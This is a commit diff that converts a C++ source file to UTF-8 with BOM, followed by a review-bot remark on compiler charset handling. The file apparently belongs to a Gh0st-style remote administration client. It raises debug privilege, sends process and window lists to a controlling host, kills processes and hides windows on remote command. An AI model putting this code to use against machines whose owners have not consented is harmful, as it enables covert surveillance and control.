style: Change files encoding format to UTF8-BOM

yuanyuanxiang
2026-01-02 20:00:18 +01:00
parent ba9be08411
commit b6af9ce615
356 changed files with 2819 additions and 2819 deletions


@@ -1,4 +1,4 @@
// SystemManager.cpp: implementation of the CSystemManager class.
// SystemManager.cpp: implementation of the CSystemManager class.
//
//////////////////////////////////////////////////////////////////////
@@ -24,17 +24,17 @@
CSystemManager::CSystemManager(IOCPClient* ClientObject,BOOL bHow, void* user):CManager(ClientObject)
{
if (bHow==COMMAND_SYSTEM) {
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//进程
SendProcessList();
} else if (bHow==COMMAND_WSLIST) {
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//窗口
SendWindowsList();
}
}
VOID CSystemManager::SendProcessList()
{
LPBYTE szBuffer = GetProcessList(); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = GetProcessList(); //得到进程列表的数据
if (szBuffer == NULL)
return;
HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader());
@@ -46,7 +46,7 @@ VOID CSystemManager::SendProcessList()
void CSystemManager::SendWindowsList()
{
LPBYTE szBuffer = GetWindowsList(); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = GetWindowsList(); //得到窗口列表的数据
if (szBuffer == NULL)
return;
HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader());
@@ -56,7 +56,7 @@ void CSystemManager::SendWindowsList()
LPBYTE CSystemManager::GetProcessList()
{
DebugPrivilege(SE_DEBUG_NAME,TRUE); //<EFBFBD><EFBFBD>ȡȨ<EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME,TRUE); //提取权限
HANDLE hProcess = NULL;
HANDLE hSnapshot = NULL;
@@ -68,23 +68,23 @@ LPBYTE CSystemManager::GetProcessList()
DWORD dwOffset = 0;
DWORD dwLength = 0;
DWORD cbNeeded = 0;
HMODULE hModules = NULL; //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>һ<EFBFBD><EFBFBD>ģ<EFBFBD><EFBFBD><EFBFBD>ľ<EFBFBD><EFBFBD><EFBFBD>
HMODULE hModules = NULL; //进程中第一个模块的句柄
LPBYTE szBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //<EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD>»<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
LPBYTE szBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); //暂时分配一下缓冲区
if (szBuffer == NULL)
return NULL;
szBuffer[0] = TOKEN_PSLIST; //ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ
szBuffer[0] = TOKEN_PSLIST; //注意这个是数据头
dwOffset = 1;
if(Process32First(hSnapshot, &pe32)) { //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>һ<EFBFBD><EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><EFBFBD>ɹ<EFBFBD>
if(Process32First(hSnapshot, &pe32)) { //得到第一个进程顺便判断一下系统快照是否成功
do {
//<EFBFBD>򿪽<EFBFBD><EFBFBD>̲<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ؾ<EFBFBD><EFBFBD><EFBFBD>
//打开进程并返回句柄
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, pe32.th32ProcessID); //<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
FALSE, pe32.th32ProcessID); //打开目标进程
{
//ö<EFBFBD>ٵ<EFBFBD>һ<EFBFBD><EFBFBD>ģ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><EFBFBD><EFBFBD>ǵ<EFBFBD>ǰ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>
//枚举第一个模块句柄也就是当前进程完整路径
EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
//<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//得到自身的完整名称
DWORD dwReturn = GetModuleFileNameEx(hProcess, hModules,
szProcessFullPath,
sizeof(szProcessFullPath));
@@ -97,18 +97,18 @@ LPBYTE CSystemManager::GetProcessList()
const char* arch = is64Bit ? "x64" : "x86";
char exeFile[300];
sprintf(exeFile, "%s:%s", pe32.szExeFile, arch);
//<EFBFBD><EFBFBD>ʼ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD>õĻ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ǹ<EFBFBD><C7B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ݽṹ
// <EFBFBD>˽<EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
//开始计算占用的缓冲区, 我们关心他的发送的数据结构
// 此进程占用数据大小
dwLength = sizeof(DWORD) +
lstrlen(exeFile) + lstrlen(szProcessFullPath) + 2;
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// 缓冲区太小,再重新分配下
if (LocalSize(szBuffer) < (dwOffset + dwLength))
szBuffer = (LPBYTE)LocalReAlloc(szBuffer, (dwOffset + dwLength),
LMEM_ZEROINIT|LMEM_MOVEABLE);
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>򻺳<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ݽṹ<DDBD><E1B9B9>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0 <20><><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD>Ϊ<EFBFBD>ַ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 <20><>β<EFBFBD><CEB2>
//接下来三个memcpy就是向缓冲区里存放数据 数据结构是
//进程ID+进程名+0+进程完整名+0 进程
//因为字符数据是以0 结尾的
memcpy(szBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
@@ -118,17 +118,17 @@ LPBYTE CSystemManager::GetProcessList()
memcpy(szBuffer + dwOffset, szProcessFullPath, lstrlen(szProcessFullPath) + 1);
dwOffset += lstrlen(szProcessFullPath) + 1;
}
} while(Process32Next(hSnapshot, &pe32)); //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
} while(Process32Next(hSnapshot, &pe32)); //继续得到下一个快照
}
DebugPrivilege(SE_DEBUG_NAME,FALSE); //<EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD>Ȩ
SAFE_CLOSE_HANDLE(hSnapshot); //<EFBFBD>ͷž<EFBFBD><EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME,FALSE); //还原提权
SAFE_CLOSE_HANDLE(hSnapshot); //释放句柄
return szBuffer;
}
CSystemManager::~CSystemManager()
{
Mprintf("ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>\n");
Mprintf("系统析构\n");
}
BOOL CSystemManager::DebugPrivilege(const char *szName, BOOL bEnable)
@@ -137,7 +137,7 @@ BOOL CSystemManager::DebugPrivilege(const char *szName, BOOL bEnable)
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD> Token <EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//进程 Token 令牌
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
bResult = FALSE;
@@ -182,7 +182,7 @@ VOID CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break;
}
case CMD_WINDOW_TEST: { //<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
case CMD_WINDOW_TEST: { //操作窗口
TestWindow(szBuffer+1);
break;
}
@@ -192,46 +192,46 @@ VOID CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
}
}
void CSystemManager::TestWindow(LPBYTE szBuffer) //<EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>С <20><><EFBFBD>ض<EFBFBD><D8B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFB4A6>
void CSystemManager::TestWindow(LPBYTE szBuffer) //窗口的最大 最小 隐藏都在这里处理
{
DWORD Hwnd;
DWORD dHow;
memcpy((void*)&Hwnd,szBuffer,sizeof(DWORD)); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD>
memcpy(&dHow,szBuffer+sizeof(DWORD),sizeof(DWORD)); //<EFBFBD>õ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
memcpy((void*)&Hwnd,szBuffer,sizeof(DWORD)); //得到窗口句柄
memcpy(&dHow,szBuffer+sizeof(DWORD),sizeof(DWORD)); //得到窗口处理参数
ShowWindow((HWND__ *)Hwnd,dHow);
//<EFBFBD><EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD> <20><>ɶ(<28><> С <20><><EFBFBD><EFBFBD> <20><>ԭ)
//窗口句柄 干啥(大 小 隐藏 还原)
}
VOID CSystemManager::KillProcess(LPBYTE szBuffer, UINT ulLength)
{
HANDLE hProcess = NULL;
DebugPrivilege(SE_DEBUG_NAME, TRUE); //<EFBFBD><EFBFBD>Ȩ
DebugPrivilege(SE_DEBUG_NAME, TRUE); //提权
for (int i = 0; i < ulLength; i += 4)
//<EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD>ܸ<EFBFBD><EFBFBD><EFBFBD>ֹ<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//因为结束的可能个不止是一个进程
{
//<EFBFBD>򿪽<EFBFBD><EFBFBD><EFBFBD>
//打开进程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(szBuffer + i));
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//结束进程
TerminateProcess(hProcess, 0);
SAFE_CLOSE_HANDLE(hProcess);
}
DebugPrivilege(SE_DEBUG_NAME, FALSE); //<EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD>Ȩ
// <EFBFBD><EFBFBD><EFBFBD><EFBFBD>Sleep<EFBFBD>£<EFBFBD><EFBFBD><EFBFBD>ֹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
DebugPrivilege(SE_DEBUG_NAME, FALSE); //还原提权
// 稍稍Sleep下,防止出错
Sleep(100);
}
LPBYTE CSystemManager::GetWindowsList()
{
LPBYTE szBuffer = NULL; //char* p = NULL &p
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&szBuffer); //ע<EFBFBD><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD>API<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>к<EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳע<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD> <20>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&szBuffer); //注册函数
//如果API函数参数当中有函数指针存在
//就是向系统注册一个 回调函数
szBuffer[0] = TOKEN_WSLIST;
return szBuffer;
}
BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //Ҫ<EFBFBD><EFBFBD><EFBFBD><EFBFBD> **
BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //要数据 **
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
@@ -240,24 +240,24 @@ BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //Ҫ
char szTitle[1024];
memset(szTitle, 0, sizeof(szTitle));
//<EFBFBD>õ<EFBFBD>ϵͳ<EFBFBD><EFBFBD><EFBFBD>ݽ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĵ<EFBFBD><EFBFBD>ھ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĵ<EFBFBD><EFBFBD>ڱ<EFBFBD><EFBFBD><EFBFBD>
//得到系统传递进来的窗口句柄的窗口标题
GetWindowText(hWnd, szTitle, sizeof(szTitle));
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7>ɼ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>
//这里判断 窗口是否可见 或标题为空
if (!IsWindowVisible(hWnd) || lstrlen(szTitle) == 0)
return true;
//ͬ<EFBFBD><EFBFBD><EFBFBD>̹<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><EFBFBD>͵<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض˵<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ
//同进程管理一样我们注意他的发送到主控端的数据结构
if (szBuffer == NULL)
szBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //<EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
szBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //暂时分配缓冲区
if (szBuffer == NULL)
return FALSE;
//[<EFBFBD><EFBFBD>Ϣ][4Notepad.exe\0]
//[消息][4Notepad.exe\0]
dwLength = sizeof(DWORD) + lstrlen(szTitle) + 1;
dwOffset = LocalSize(szBuffer); //1
//<EFBFBD><EFBFBD><EFBFBD>¼<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С
//重新计算缓冲区大小
szBuffer = (LPBYTE)LocalReAlloc(szBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
if (szBuffer == NULL)
return FALSE;
//<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<EFBFBD><EFBFBD><EFBFBD>ܿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹΪ hwnd+<2B><><EFBFBD>ڱ<EFBFBD><DAB1><EFBFBD>+0
//下面两个memcpy就能看到数据结构为 hwnd+窗口标题+0
memcpy((szBuffer+dwOffset),&hWnd,sizeof(DWORD));
memcpy(szBuffer + dwOffset + sizeof(DWORD), szTitle, lstrlen(szTitle) + 1);
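Review bot: The re-encoding changes a runtime string as well as comments: in the hunk at `@@ -118,17 +118,17 @@` the destructor's `Mprintf("系统析构\n")` literal is now stored as UTF-8 with a BOM. If this is built with MSVC (the build settings are not visible here), the BOM makes the compiler decode the source as UTF-8 and then convert narrow literals to the execution character set, which defaults to the build machine's code page. The bytes emitted can therefore differ between build hosts, and characters that code page cannot represent may be replaced. Pin the choice in the build configuration (for example `/utf-8` or an explicit `/execution-charset:`) and confirm that whatever consumes Mprintf output expects that encoding; narrow literals in the other converted files would need the same check. A header comment such as `// Source is UTF-8 with BOM; narrow string literals follow the configured execution charset` would record the decision.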